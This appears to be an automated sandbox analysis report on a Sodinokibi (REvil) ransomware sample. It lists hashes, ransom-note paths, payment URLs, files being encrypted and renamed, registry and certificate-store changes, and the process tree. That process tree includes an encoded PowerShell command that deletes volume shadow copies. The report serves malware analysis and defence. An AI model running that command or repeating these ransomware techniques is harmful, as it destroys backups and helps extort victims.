Analysis
- Max time kernel: 138s
- Max time network: 115s
- Platform: windows7_x64
- Resource: win7v200722
- Submitted: 20-08-2020 13:03
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
  - Resource: win7v200722
- Behavioral task: behavioral2
  - Sample: 4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
  - Resource: win10

General
- Target: 4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
- Size: 115KB
- MD5: be926a24f4118fc23f09ce4ecd9ebff0
- SHA1: 4d6b8d954af01ff556aecb055f1965063ec3471e
- SHA256: 4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695
- SHA512: 278b8c39930f5cd98660b2f770452f227947800baaa07a8f583d26d67bd420e3a09f44f9c625068e18988d50318c0d5ed97dc0600b5e60ad803a222dab969ca7
Malware Config
Extracted
- Path: C:\h0qy8hq-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/51BF6F9E4FD08A9A
  - http://decryptor.cc/51BF6F9E4FD08A9A
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (156 IoCs)
Processes: rundll32.exe (PID 1504); 64 network flows attributed to this process, flow ids 2 through 112
Modifies extensions of user files (9 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: rundll32.exe
- File renamed C:\Users\Admin\Pictures\StartComplete.tif => \??\c:\users\admin\pictures\StartComplete.tif.h0qy8hq
- File renamed C:\Users\Admin\Pictures\TestReset.tiff => \??\c:\users\admin\pictures\TestReset.tiff.h0qy8hq
- File renamed C:\Users\Admin\Pictures\UnblockRedo.tif => \??\c:\users\admin\pictures\UnblockRedo.tif.h0qy8hq
- File opened for modification \??\c:\users\admin\pictures\TestReset.tiff
- File renamed C:\Users\Admin\Pictures\MoveMeasure.png => \??\c:\users\admin\pictures\MoveMeasure.png.h0qy8hq
- File renamed C:\Users\Admin\Pictures\PopJoin.tif => \??\c:\users\admin\pictures\PopJoin.tif.h0qy8hq
- File renamed C:\Users\Admin\Pictures\RepairConvert.raw => \??\c:\users\admin\pictures\RepairConvert.raw.h0qy8hq
- File renamed C:\Users\Admin\Pictures\ResumeUninstall.png => \??\c:\users\admin\pictures\ResumeUninstall.png.h0qy8hq
- File renamed C:\Users\Admin\Pictures\SearchShow.png => \??\c:\users\admin\pictures\SearchShow.png.h0qy8hq
Enumerates connected drives (3 TTPs)
Drops file in System32 directory (1 IoC)
Processes: rundll32.exe
- File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: rundll32.exe
- Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7jibdqgca48f.bmp"
Drops file in Program Files directory (37 IoCs)
Processes: rundll32.exe
- File opened for modification \??\c:\program files\EnableDismount.css
- File opened for modification \??\c:\program files\ResizeReset.wma
- File opened for modification \??\c:\program files\ResumeTest.AAC
- File opened for modification \??\c:\program files\DisableDebug.rtf
- File opened for modification \??\c:\program files\UndoCompress.pub
- File created \??\c:\program files\h0qy8hq-readme.txt
- File created \??\c:\program files (x86)\h0qy8hq-readme.txt
- File opened for modification \??\c:\program files\ConvertFromExit.pps
- File opened for modification \??\c:\program files\ConvertFromPush.TTS
- File opened for modification \??\c:\program files\ConvertFromSearch.vb
- File opened for modification \??\c:\program files\PopBackup.m4a
- File opened for modification \??\c:\program files\SaveInvoke.dib
- File opened for modification \??\c:\program files\UninstallApprove.vssm
- File opened for modification \??\c:\program files\RepairExport.pptx
- File opened for modification \??\c:\program files\SavePop.ogg
- File opened for modification \??\c:\program files\StopFormat.scf
- File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\h0qy8hq-readme.txt
- File opened for modification \??\c:\program files\CompleteSplit.tif
- File opened for modification \??\c:\program files\HideExpand.css
- File opened for modification \??\c:\program files\ImportRemove.m3u
- File opened for modification \??\c:\program files\SendRequest.png
- File opened for modification \??\c:\program files\ReceiveOpen.mpg
- File opened for modification \??\c:\program files\RenameSkip.wmv
- File opened for modification \??\c:\program files\CompareRedo.wmf
- File opened for modification \??\c:\program files\EditHide.TS
- File opened for modification \??\c:\program files\LockSearch.ADT
- File opened for modification \??\c:\program files\PopStop.vb
- File opened for modification \??\c:\program files\UnprotectLock.vst
- File created \??\c:\program files\microsoft sql server compact edition\v3.5\h0qy8hq-readme.txt
- File opened for modification \??\c:\program files\BackupClose.tiff
- File opened for modification \??\c:\program files\FormatInitialize.mht
- File created \??\c:\program files\microsoft sql server compact edition\h0qy8hq-readme.txt
- File opened for modification \??\c:\program files\RepairEdit.temp
- File opened for modification \??\c:\program files\CloseUnprotect.docx
- File opened for modification \??\c:\program files\EditResume.au
- File opened for modification \??\c:\program files\RestoreNew.mhtml
- File opened for modification \??\c:\program files\SubmitInstall.au3
Modifies system certificate store
Processes: rundll32.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate data omitted)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate data omitted)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (certificate data omitted)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (certificate data omitted)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: rundll32.exe, powershell.exe
- PID 1504 rundll32.exe
- PID 1600 powershell.exe (2 events)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: rundll32.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1504 rundll32.exe
- Token: SeDebugPrivilege, PID 1600 powershell.exe
- Token: SeBackupPrivilege, PID 1876 vssvc.exe
- Token: SeRestorePrivilege, PID 1876 vssvc.exe
- Token: SeAuditPrivilege, PID 1876 vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 1504 rundll32.exe
Suspicious use of WriteProcessMemory (11 IoCs)
Processes: rundll32.exe, rundll32.exe
- PID 1436 (rundll32.exe) wrote to memory of PID 1504 (rundll32.exe): 7 events
- PID 1504 (rundll32.exe) wrote to memory of PID 1600 (powershell.exe): 4 events
Processes
- C:\Windows\system32\rundll32.exe (PID 1436)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 1504, child of 1436)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll,#1
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1600, child of 1504)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is a base64-encoded UTF-16LE PowerShell command; it decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of volume shadow copies, which is consistent with the vssvc.exe activity recorded below.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 1040)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 1876)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken